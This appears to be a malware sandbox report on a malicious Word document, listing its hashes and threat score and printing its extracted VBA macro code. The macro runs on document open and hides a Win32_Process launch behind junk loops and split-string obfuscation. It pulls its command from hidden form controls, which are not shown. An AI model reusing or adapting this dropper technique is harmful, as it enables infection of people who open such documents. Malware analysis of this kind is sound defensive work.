362b17dae1075faba9fe643e328ea5ce5b682e71a90958f2716026c90fd84602

Sharing

Copy URL

Twitter E-mail

General

Target

362b17dae1075faba9fe643e328ea5ce5b682e71a90958f2716026c90fd84602
Size

181KB
MD5

2e89f8f34d9c1d63c57c9a545d5298e8
SHA1

5ff5f419ab1e8b2a753aed8cb87351b9299a621d
SHA256

362b17dae1075faba9fe643e328ea5ce5b682e71a90958f2716026c90fd84602
SHA512

13d1218ef783c022b410b5244f3d8c92e904b15517a2cc40507bee31f3dcc932b4ad8501d08e3bb3344ee3d4c60f8f67081d77f466757fad6667341d206067ad
SSDEEP

3072:9NO2y/GdywFyktGDWLS0HZWD5w8K7Nk9rD7IBUdasiv8OP7d:9NO2k4PF7tGiL3HJk9rD7bdasiv86B

Score

8^/10

macro

Malware Config

Signatures

Suspicious Office macro 1 IoCs

Office document equipped with macros.

macro

resource
sample

Files

362b17dae1075faba9fe643e328ea5ce5b682e71a90958f2716026c90fd84602
.doc windows office2003

Aojplemq

1

Attribute VB_Name = "Aojplemq"

2

Attribute VB_Base = "1Normal.ThisDocument"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = True

7

Attribute VB_TemplateDerived = True

8

Attribute VB_Customizable = True

9

Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox"

10

Private Sub Document_open()

11

Ltyncvvwo = 234 + 423

12

Do While Cikubwvivihv = 1

13

Hcmhzkjwdl = 3 * Fqdsyasenoww

14

Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.")

15

For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh

16

Bnbajuowvggcm = ("Rerum ad nihil vel.")

17

Gingzqsy = 223

18

Next

19

Uuavxkoiio = Elfrlfbvs

20

Loop

21

Ewxdqdei

22

Ewdbqeofwfve = 234 + 423

23

Do While Ucwjhgwmvyh = 1

24

Rdkgxjky = 3 * Hscfaewhrzd

25

Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.")

26

For Lzxvhrtl = Favhzrpsxom To Trngalouzizs

27

Wrljfjwzrb = ("Velit saepe.")

28

Ndffipzh = 223

29

Next

30

Ulszawfr = Chtalegcvuz

31

Loop

32

End Sub

33

Jeuwzqvsdrcqz

1

Attribute VB_Name = "Jeuwzqvsdrcqz"

2

Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}"

3

Attribute VB_GlobalNameSpace = False

4

Attribute VB_Creatable = False

5

Attribute VB_PredeclaredId = True

6

Attribute VB_Exposed = False

7

Attribute VB_TemplateDerived = False

8

Attribute VB_Customizable = False

9

Rgzhzedt

1

Attribute VB_Name = "Rgzhzedt"

2

Function Ypzdgmswtvdol()

3

Ecpsjpwmt = 234 + 423

4

Do While Iflpcowzdtqob = 1

5

Qlrgusoolmu = 3 * Evuphzdzzkfb

6

Mnnnndwy = ("Et.")

7

For Nqguqadhjbui = Gckorame To Bbxyhbyfjab

8

Jiygysjieomg = ("Enim ut vel.")

9

Hhkijhrspcfz = 223

10

Next

11

Oyzzpjbf = Nlzgxmlswiqx

12

Loop

13

Ccahqiqatqpii = Aojplemq.Gzuokbkyuug

14

Xoxcfslhh = 234 + 423

15

Do While Pkocrnurft = 1

16

Kkoupcjxomswo = 3 * Llcoewtryqjb

17

Bqljpnrrywfxb = ("Autem.")

18

For Sroysigd = Cqtqegapan To Nyfcungih

19

Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.")

20

Upfiaghl = 223

21

Next

22

Tqotxwchqfk = Xomriamlhe

23

Loop

24

Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu

25

Zcyuqbzhudyk = 234 + 423

26

Do While Wvxzhtphlfoe = 1

27

Ibunrqdbman = 3 * Aoxboyme

28

Vjpfsrtgmsmz = ("In tempora dolor aut amet.")

29

For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv

30

Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.")

31

Jkgqadlqc = 223

32

Next

33

Xmwymfrzzqoo = Skfbpvqn

34

Loop

35

Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag

36

Lhsyghafslbi = 234 + 423

37

Do While Letzvixom = 1

38

Xdgyuyaelpj = 3 * Hgrkaaarl

39

Gdjeewwuxkid = ("Ea et.")

40

For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz

41

Uphpromjiicnw = ("Magnam.")

42

Pgxecxxnq = 223

43

Next

44

Ntkkyuimxzkb = Ofkffhbrs

45

Loop

46

Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq

47

Yyqtlblmjar = 234 + 423

48

Do While Usazcqclwva = 1

49

Bvovtqeuu = 3 * Dwiiuaeoe

50

Iihvwfbbcqq = ("Quaerat id voluptates quis est.")

51

For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup

52

Plpplkfme = ("Dicta.")

53

Pcryihkdhla = 223

54

Next

55

Zavjsxectfr = Enincmvatq

56

Loop

57

End Function

58

Function Ewxdqdei()

59

Hhahpldlmgytv = 234 + 423

60

Do While Bdbvsqpntmg = 1

61

Cpsroosgidlmw = 3 * Nxrrvfnk

62

Iisthuiee = ("Larry")

63

For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk

64

Ujcwmygukzttl = ("Ronnie")

65

Puyciwrsobfm = 223

66

Next

67

Gifyxuvw = Gurqiiogepkv

68

Loop

69

iwiwiiwiwjjsj = "__&888*&^bBGks^@"

70

Dxztlkebm = 234 + 423

71

Do While Ngqkvsvdtavag = 1

72

Mvopoxnzbmda = 3 * Vpwvlvkkk

73

Xiaghwsmsyin = ("Sint hic officiis vel.")

74

For Bagoxrskw = Yfumibldur To Ttpkosinbao

75

Evmtdnmdvjry = ("Et.")

76

Wwjcpnmnvh = 223

77

Next

78

Rojjyrkr = Zjqecjxky

79

Loop

80

Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Aojplemq.Gzuokbkyuug + "__&888*&^bBGks^@ro__&888*&^bBGks^@ce__&888*&^bBGks^@ss__&888*&^bBGks^@", iwiwiiwiwjjsj)

81

Bfmckkwihiaz = 234 + 423

82

Do While Aekpydhwj = 1

83

Qqwjgipnqlgs = 3 * Kwbemzutb

84

Kweanfwvktua = ("Et.")

85

For Zllzuuml = Ggsxryxovqw To Mdgkwomqwc

86

Nithghznru = ("Sed molestiae libero quam recusandae.")

87

Yemwfeiena = 223

88

Next

89

Nkpwwwkdpldqe = Jxztswtlscq

90

Loop

91

Dcnoxqwznm = Join(Uqdvmpngkfcs, "")

92

Hxaemhxqqzcle = 234 + 423

93

Do While Wwlxqtzpxi = 1

94

Chldewgncwp = 3 * Kacgyyjy

95

Lbiscihdwutvi = ("Ut impedit nemo eos numquam aliquam sapiente non facere et.")

96

For Xoxxkzhptftxi = Ipdizbvedf To Tbkprxkajman

97

Momjkzell = ("Consectetur illo asperiores sint.")

98

Zfubjusqgnnj = 223

99

Next

100

Zxyawopj = Hsuuvohpgxs

101

Loop

102

Set Gkjpnwxihmxy = GetObject(Dcnoxqwznm)

103

Wlyhavvsmu = 234 + 423

104

Do While Tpysogzamph = 1

105

Bwlmexbp = 3 * Rfqcymry

106

Hmzudygckwge = ("Celia")

107

For Yzkghwob = Hmxeaovrrp To Xqigryfexnr

108

Zckrtggu = ("Commodi ea asperiores.")

109

Qabbwapmxgi = 223

110

Next

111

Xafpvnotukab = Zyiqvidsfp

112

Loop

113

Rioscijwwxx = Dcnoxqwznm + Jeuwzqvsdrcqz.Lcgurlihjqe.ControlTipText + Jeuwzqvsdrcqz.Kavzasrckkfrp.ControlTipText

114

Ihcumvqfu = 234 + 423

115

Do While Bjpnoqgqqibbt = 1

116

Vikhgitnanug = 3 * Bvaawtxd

117

Hditxgfjruz = ("Qui ab illum.")

118

For Ngpiwpatkuno = Bwjusowa To Zqthlosd

119

Mthkantu = ("Vanessa")

120

Vejfemizgs = 223

121

Next

122

Dpigvsivbj = Ohpytevbeu

123

Loop

124

Jhotvpvvro = Rioscijwwxx + Aojplemq.Gzuokbkyuug

125

Dhfwqdskkhs = 234 + 423

126

Do While Ocwipifcilro = 1

127

Suybjheaymlq = 3 * Zavtdfcn

128

Keanuwnivlzqm = ("Eum ratione ut iure aut autem ipsa.")

129

For Opodjxyze = Pylppfnzr To Qfczduybi

130

Kpqojxblfvl = ("Suscipit eligendi hic beatae.")

131

Pxgvucmod = 223

132

Next

133

Ibktdadttznwz = Qyfaletvjgoch

134

Loop

135

Set Ewxdqdei = GetObject(Jhotvpvvro)

136

Nucgbbkfmrw = 234 + 423

137

Do While Zjyflsijyjq = 1

138

Lqajsmkphjybu = 3 * Tysbepbxrmh

139

Gokmzcpt = ("Autem ut necessitatibus ut possimus veniam ut.")

140

For Yjwarzze = Tqarpdikt To Lwkjsymcrvvnv

141

Ipjxsiqigqn = ("Naomi")

142

Vufawgmmmryam = 223

143

Next

144

Kxcfwyvtavqnv = Tefqgxqv

145

Loop

146

Ewxdqdei.XSize = False

147

Xmdofjmztyom = 234 + 423

148

Do While Wztomnceaofqu = 1

149

Kcwxgtpgyku = 3 * Yjpnjsiw

150

Wbqtlpioockjv = ("Qui rerum consequuntur.")

151

For Pehtvdstzfr = Gcbsrdzwqzdq To Frrpoxyunbdw

152

Hqouqqima = ("Aspernatur.")

153

Ssszeecgimci = 223

154

Next

155

Btmoapuh = Zliayntrzxv

156

Loop

157

Ewxdqdei.YSize = False

158

Hgdqfewunrxo = 234 + 423

159

Do While Pbpubepsghts = 1

160

Tgisphoj = 3 * Encalomdw

161

Vaypoeoz = ("Autem eos magni.")

162

For Nssahjezfggdg = Bpgsvpvbcyf To Aczkbkru

163

Efherdwrtibnp = ("Rudy")

164

Airrqcbzb = 223

165

Next

166

Gvbwytrp = Oldxgglacm

167

Loop

168

Do While Gkjpnwxihmxy.Create(KSNNSN & Ypzdgmswtvdol, Ssirbkkvy, Ewxdqdei, Xfvqhbpjicvz)

169

Loop

170

Cjevedjkn = 234 + 423

171

Do While Ornzcmqtw = 1

172

Edsdgulonr = 3 * Kxbxtdzfqylj

173

Pbehyigsfbcb = ("Quasi sequi veritatis perspiciatis.")

174

For Yyzojwdcapx = Utfsjmofkkfsv To Ravsgkgrzwzu

175

Bokjmmzzjt = ("Quae non ipsa distinctio reprehenderit error autem.")

176

Joouvoilka = 223

177

Next

178

Ilnbgvjrz = Vvjjbssrcd

179

Loop

180

End Function

181

182

Sharing

General

Malware Config

Signatures

Files

Aojplemq

Jeuwzqvsdrcqz

Rgzhzedt

We care about your privacy.